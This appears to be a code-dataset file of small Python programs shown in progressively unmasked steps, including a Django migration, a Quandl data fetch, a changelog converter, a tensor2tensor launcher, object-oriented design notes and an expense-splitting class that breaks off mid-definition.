"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0005_auto_20200111_1513')]\n operations = [migrations.AlterField(model_name='post', name='photo',\n field=models.TextField(default='https://medium.com/'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('blog', '0005_auto_20200111_1513')]\n operations = [migrations.AlterField(model_name='post', name='photo',\n field=models.TextField(default='https://medium.com/'))]\n",
"step-5": "# Generated by Django 3.0.1 on 2020-01-11 09:50\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0005_auto_20200111_1513'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='photo',\n field=models.TextField(default='https://medium.com/'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import requests
import json
import pandas as pd
n1 = 'ADS'
api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1
df = pd.read_csv(api_url)
df = df.head(100)
print(df.head())
#print(list(data))
|
normal
|
{
"blob_id": "3dd4b4d4241e588cf44230891f496bafb30c6153",
"index": 46,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(df.head())\n",
"step-3": "<mask token>\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n",
"step-4": "import requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n",
"step-5": "\n\nimport requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n#print(list(data))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python3
from datetime import datetime
import re
import sys
MONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'
'January|February|March|April|June|July|August|September|October|November|December')
re_entry_begin = re.compile(r'(?P<version>[\d.]+)[ :]*\(?(?P<date>\d\d\d\d-\d\d-\d\d|(?:'
+ MONTHS_REGEXP + r') \d\d, \d\d\d\d)?\)?.*$')
header_format = 'libkissfft ({version}) stable; urgency=medium\n\n'
signature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n'
# Missing from CHANGELOG (found in hg log), or not parseable easily
VERSION_DATES = {
'1.2.8': '2008-08-22',
'1.2.7': '2007-01-07',
'1.2.2': '2005-05-06',
'1.2.1': '2004-04-04',
'1.1.1': '2004-02-01',
'1.1': '2004-01-30',
'0.4': '2003-11-04',
'0.1': '2003-05-19',
}
first_line_met = False
current_date = None
last_line_blank = False
for line in sys.stdin:
m = re_entry_begin.match(line)
if m:
if first_line_met:
sys.stdout.write(signature_format.format(date=current_date))
version = m.group('version')
sys.stdout.write(header_format.format(version=version))
date = m.group('date')
if date is None:
date = VERSION_DATES[version]
current_date = None
for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):
try:
current_date = datetime.strptime(date, date_format)
break
except ValueError:
continue
if current_date is None:
raise ValueError('Date {} does not match any date format in {!r}'
.format(date, date_formats))
first_line_met = True
line_blank = not line.strip() or line.startswith(r'\* *This Change Log was')
if first_line_met and not (line_blank and last_line_blank):
sys.stdout.write(' ' + line)
last_line_blank = line_blank
if first_line_met:
if not line_blank:
sys.stdout.write('\n')
sys.stdout.write(signature_format.format(date=current_date))
|
normal
|
{
"blob_id": "03677f02473019fcc6a40d91569a85be78ca0a87",
"index": 7179,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-3": "<mask token>\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-4": "from datetime import datetime\nimport re\nimport sys\nMONTHS_REGEXP = (\n 'Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|January|February|March|April|June|July|August|September|October|November|December'\n )\nre_entry_begin = re.compile(\n '(?P<version>[\\\\d.]+)[ :]*\\\\(?(?P<date>\\\\d\\\\d\\\\d\\\\d-\\\\d\\\\d-\\\\d\\\\d|(?:' +\n MONTHS_REGEXP + ') \\\\d\\\\d, \\\\d\\\\d\\\\d\\\\d)?\\\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = \"\"\" -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\n\n\"\"\"\nVERSION_DATES = {'1.2.8': '2008-08-22', '1.2.7': '2007-01-07', '1.2.2':\n '2005-05-06', '1.2.1': '2004-04-04', '1.1.1': '2004-02-01', '1.1':\n '2004-01-30', '0.4': '2003-11-04', '0.1': '2003-05-19'}\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n version = m.group('version')\n sys.stdout.write(header_format.format(version=version))\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n line_blank = not line.strip() or line.startswith('\\\\* *This Change Log was'\n )\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n last_line_blank = line_blank\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-5": "#!/usr/bin/env python3\nfrom datetime import datetime\nimport re\nimport sys\n\nMONTHS_REGEXP = ('Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec|'\n 'January|February|March|April|June|July|August|September|October|November|December')\n\nre_entry_begin = re.compile(r'(?P<version>[\\d.]+)[ :]*\\(?(?P<date>\\d\\d\\d\\d-\\d\\d-\\d\\d|(?:'\n + MONTHS_REGEXP + r') \\d\\d, \\d\\d\\d\\d)?\\)?.*$')\nheader_format = 'libkissfft ({version}) stable; urgency=medium\\n\\n'\nsignature_format = ' -- Paul Morelle <[email protected]> {date:%a, %d %b %Y %H:%M:%S +0000}\\n\\n'\n\n# Missing from CHANGELOG (found in hg log), or not parseable easily\nVERSION_DATES = {\n '1.2.8': '2008-08-22',\n '1.2.7': '2007-01-07',\n '1.2.2': '2005-05-06',\n '1.2.1': '2004-04-04',\n '1.1.1': '2004-02-01',\n '1.1': '2004-01-30',\n '0.4': '2003-11-04',\n '0.1': '2003-05-19',\n}\n\nfirst_line_met = False\ncurrent_date = None\nlast_line_blank = False\n\nfor line in sys.stdin:\n m = re_entry_begin.match(line)\n if m:\n if first_line_met:\n sys.stdout.write(signature_format.format(date=current_date))\n\n version = m.group('version')\n\n sys.stdout.write(header_format.format(version=version))\n\n date = m.group('date')\n if date is None:\n date = VERSION_DATES[version]\n\n current_date = None\n for date_format in ('%Y-%m-%d', '%b %d, %Y', '%B %d, %Y'):\n try:\n current_date = datetime.strptime(date, date_format)\n break\n except ValueError:\n continue\n if current_date is None:\n raise ValueError('Date {} does not match any date format in {!r}'\n .format(date, date_formats))\n first_line_met = True\n\n line_blank = not line.strip() or line.startswith(r'\\* *This Change Log was')\n\n if first_line_met and not (line_blank and last_line_blank):\n sys.stdout.write(' ' + line)\n\n last_line_blank = line_blank\n\nif first_line_met:\n if not line_blank:\n sys.stdout.write('\\n')\n sys.stdout.write(signature_format.format(date=current_date))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
siswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')
siswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
<|reserved_special_token_1|>
from kelas import Siswa
siswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')
siswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
<|reserved_special_token_1|>
#import fungsi_saya as fs
# from fungsi_saya import kalkulator as k
# hasil = k(10,5,'+')
# print(hasil)
from kelas import Siswa
siswa_1 = Siswa('Afif', "A.I.", 17, 'XII IPA')
siswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
siswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')
#print(Siswa.jum_siswa)
|
flexible
|
{
"blob_id": "bd2c327915c1e133a6e7b7a46290369440d50347",
"index": 3876,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsiswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')\nsiswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\n",
"step-3": "from kelas import Siswa\nsiswa_1 = Siswa('Afif', 'A.I.', 17, 'XII IPA')\nsiswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\n",
"step-4": "#import fungsi_saya as fs\n# from fungsi_saya import kalkulator as k\n\n# hasil = k(10,5,'+')\n# print(hasil)\n\nfrom kelas import Siswa\n\nsiswa_1 = Siswa('Afif', \"A.I.\", 17, 'XII IPA')\nsiswa_2 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_3 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_4 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_5 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_6 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\nsiswa_7 = Siswa('Bayu', 'Sudrajat', 20, 'XII IPS')\n#print(Siswa.jum_siswa)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
i = 0
real_value = 8
while i <= 3:
guess = int(input('Guess: '))
if guess == real_value:
print('You Win!')
break
else:
print('You lose')
|
normal
|
{
"blob_id": "70f2fc6873a78305c74e3c3ad04cb24d72019d56",
"index": 8738,
"step-1": "i = 0\nreal_value = 8\nwhile i <= 3:\n guess = int(input('Guess: '))\n if guess == real_value:\n print('You Win!')\n break\n else:\n print('You lose')\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
t2t_trainer.main(None)
print('All done.')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
t2t_trainer.main(None)
print('All done.')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
import sys
from tensor2tensor.bin import t2t_trainer
def problem_args(problem_name):
args = ['--generate_data', '--model=transformer',
'--hparams_set=transformer_librispeech_v1', '--problem=%s' %
problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %
problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %
problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %
problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
t2t_trainer.main(None)
print('All done.')
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import os
import sys
from tensor2tensor.bin import t2t_trainer
def problem_args(problem_name):
args = [
'--generate_data',
'--model=transformer',
'--hparams_set=transformer_librispeech_v1',
'--problem=%s' % problem_name,
'--data_dir=/tmp/refactor_test/problems/%s/data' % problem_name,
'--tmp_dir=/tmp/refactor_test/problems/%s/tmp' % problem_name,
'--output_dir=/tmp/refactor_test/models/%s/data' % problem_name,
'--hparams=batch_shuffle_size=0,batch_size=1000000'
]
return args
def main():
sys.argv += problem_args('librispeech_clean_small')
# sys.argv += problem_args('common_voice')
t2t_trainer.main(None)
print('All done.')
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "cc5ad95419571d3eb2689b428e5805ad69958806",
"index": 4796,
"step-1": "<mask token>\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\ndef main():\n sys.argv += problem_args('librispeech_clean_small')\n t2t_trainer.main(None)\n print('All done.')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\ndef main():\n sys.argv += problem_args('librispeech_clean_small')\n t2t_trainer.main(None)\n print('All done.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import os\nimport sys\nfrom tensor2tensor.bin import t2t_trainer\n\n\ndef problem_args(problem_name):\n args = ['--generate_data', '--model=transformer',\n '--hparams_set=transformer_librispeech_v1', '--problem=%s' %\n problem_name, '--data_dir=/tmp/refactor_test/problems/%s/data' %\n problem_name, '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' %\n problem_name, '--output_dir=/tmp/refactor_test/models/%s/data' %\n problem_name, '--hparams=batch_shuffle_size=0,batch_size=1000000']\n return args\n\n\ndef main():\n sys.argv += problem_args('librispeech_clean_small')\n t2t_trainer.main(None)\n print('All done.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import os\nimport sys\n\nfrom tensor2tensor.bin import t2t_trainer\n\n\ndef problem_args(problem_name):\n\n args = [\n '--generate_data',\n '--model=transformer',\n '--hparams_set=transformer_librispeech_v1',\n '--problem=%s' % problem_name,\n '--data_dir=/tmp/refactor_test/problems/%s/data' % problem_name,\n '--tmp_dir=/tmp/refactor_test/problems/%s/tmp' % problem_name,\n '--output_dir=/tmp/refactor_test/models/%s/data' % problem_name,\n '--hparams=batch_shuffle_size=0,batch_size=1000000'\n ]\n\n return args\n\n\ndef main():\n\n sys.argv += problem_args('librispeech_clean_small')\n # sys.argv += problem_args('common_voice')\n\n t2t_trainer.main(None)\n\n print('All done.')\n\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
print ("Hello"*5)
|
normal
|
{
"blob_id": "9ae7b6d081529a5c70b7362c852647b3638e7e98",
"index": 8105,
"step-1": "<mask token>\n",
"step-2": "print('Hello' * 5)\n",
"step-3": "print (\"Hello\"*5)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import unittest
import BasicVmLifecycleTestBase
class testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.
VmIsAccessibleViaSshTestBase):
vmName = 'cernvm'
timeout = 20 * 60
sshTimeout = 5 * 60
def suite():
return unittest.TestLoader().loadTestsFromTestCase(testVmIsAccessibleViaSsh
)
|
normal
|
{
"blob_id": "79e4e37fc17462508abf259e3a7861bd76797280",
"index": 9182,
"step-1": "<mask token>\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n vmName = 'cernvm'\n timeout = 20 * 60\n sshTimeout = 5 * 60\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n vmName = 'cernvm'\n timeout = 20 * 60\n sshTimeout = 5 * 60\n\n\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase(testVmIsAccessibleViaSsh\n )\n",
"step-4": "import unittest\nimport BasicVmLifecycleTestBase\n\n\nclass testVmIsAccessibleViaSsh(BasicVmLifecycleTestBase.\n VmIsAccessibleViaSshTestBase):\n vmName = 'cernvm'\n timeout = 20 * 60\n sshTimeout = 5 * 60\n\n\ndef suite():\n return unittest.TestLoader().loadTestsFromTestCase(testVmIsAccessibleViaSsh\n )\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
"""
    Review
    Object-oriented: approach problems from the perspective of objects.
    Abstraction: the process of discarding the individual/non-essential features (unimportant) of several things
        and extracting their common, essential nature (important).
    Three major characteristics:
        Encapsulation: split each point of variation out into its own class.
            Example: Old Zhang drives to the northeast
            Approach: define a Person class and a Car class.
        Inheritance: reuse the functionality and concepts of an existing class and extend them.
            Unifies the concept
            Example: a shape manager totals the areas of circles/rectangles/...
            Approach: use a Shape class to represent/constrain them; circles/rectangles/... each have a method that computes area.
        Polymorphism: call the parent's "abstract" method, execute the child class's "concrete" method.
            Override: replace the parent's more abstract method.
            Example: the shape manager calls a shape's compute-area method;
                each concrete shape must override that compute-area method.
            Inheritance is the commonality (computing area), polymorphism the individuality (length*width / pi *r**2).
    Design principles
        Open/closed principle: adding new functionality is allowed, modifying client code is not.
        Single responsibility: a class has one and only one reason to change.
        Dependency inversion: call the abstraction (parent), not the concretion (child);
            abstractions must not depend on concretions.
        Composite reuse: if it is merely code reuse, prefer composition.
    Class-to-class relationships
        Generalization [inheritance] (make it the parent)
        Association (make it a member variable)
        Dependency (make it a method parameter)
"""
|
normal
|
{
"blob_id": "2749a262bf8da99aa340e878c15a6dba01acc38c",
"index": 7025,
"step-1": "<mask token>\n",
"step-2": "\"\"\"\n 复习\n 面向对象:考虑问题从对象的角度出发.\n 抽象:从多个事物中,舍弃个别的/非本质的特征(不重要),\n 抽出共性的本质(重要的)过程。\n 三大特征:\n 封装:将每个变化点单独分解到不同的类中。\n 例如:老张开车去东北\n 做法:定义人类,定义车类。\n\n 继承:重用现有类的功能和概念,并在此基础上进行扩展。\n 统一概念\n 例如:图形管理器,统计圆形/矩形.....面积。\n 做法:用图形类代表/约束,圆形/矩形..具有计算面积的方法.\n\n 多态:调用父\"抽象的\"方法,执行子类\"具体的\"方法.\n 重写:覆盖父类那个比较抽象的方法。\n 例如:图形管理器调用图形的计算面积方法\n 具体图形必须重写图形的计算面积方法。\n 继承是共性(计算面积),多态个性(长*宽 / pi *r**2)。\n\n 设计原则\n 开闭原则:允许增加新功能,不允许修改客户端代码.\n 单一职责:一个有且只有一个改变的原因.\n 依赖倒置:调用抽象(父),不要调用具体(子);\n 抽象不要依赖具体.\n 组合复用:如果仅仅是代码的复用,优先使用组合.\n\n 类与类关系\n 泛化[继承](做成爸爸)\n 关联(做成成员变量)\n 依赖(做成方法参数)\n\"\"\"",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
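The notes in the record above describe polymorphism through a shape manager that calls an abstract compute-area method which each concrete shape overrides. A minimal Python sketch of that idea follows; the class and function names are illustrative assumptions, not part of any dataset record.

import math

class Shape:
    def area(self):  # the parent's "abstract" method
        raise NotImplementedError

class Rectangle(Shape):
    def __init__(self, w, h):
        self.w, self.h = w, h

    def area(self):  # override: length * width
        return self.w * self.h

class Circle(Shape):
    def __init__(self, r):
        self.r = r

    def area(self):  # override: pi * r**2
        return math.pi * self.r ** 2

def total_area(shapes):
    # the manager calls the abstract method; each subclass's override runs
    return sum(s.area() for s in shapes)

print(total_area([Rectangle(2, 3), Circle(1)]))  # 6 + pi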
class people:
<|reserved_special_token_0|>
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
<|reserved_special_token_0|>
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class people:
<|reserved_special_token_0|>
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
def get_total(self):
return self.total_spent
<|reserved_special_token_0|>
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
<|reserved_special_token_0|>
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
self.debt_temp = self.debt_temp + payment * -1
def pay_temp_debt(self, payment):
self.debt_temp - payment
def round_payments(self):
for x in range(0, len(self.pay)):
self.pay[x] = round(self.pay[x], 2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class people:
def __init__(self, name):
self.name = name
self.purchase_descrip = []
self.purchase_price_descrip = []
self.purchases = []
self.total_spent = 0
self.debt = 0
self.debt_temp = 0
self.pay = []
self.pay_out = []
self.pay_who = []
def add_purchase(self, purchase):
self.purchases.append(purchase)
def add_description(self, description):
self.purchase_descrip.append(description)
def get_purchase(self):
return self.purchases
<|reserved_special_token_0|>
def set_total(self):
self.total_spent = 0
for items in self.purchases:
self.total_spent = self.total_spent + float(items)
def get_total(self):
return self.total_spent
<|reserved_special_token_0|>
def add_purchase_descrip(self, price, description):
self.purchase_price_descrip.append('$' + str(price) + ' ' +
description)
def get_purchase_descrip(self):
return self.purchase_price_descrip
def set_debt(self, cost_per_person):
self.debt = float(self.total_spent) - cost_per_person
def get_debt(self):
return self.debt
def add_payment(self, payment):
self.pay.append(payment)
<|reserved_special_token_0|>
def add_pay_who(self, who_to_pay):
self.pay_who.append(who_to_pay)
def get_pay_who(self):
return self.pay_who
def set_debt_temp(self):
self.debt_temp = self.debt
def get_temp_debt(self):
return self.debt_temp
def update_temp_debt(self, payment):
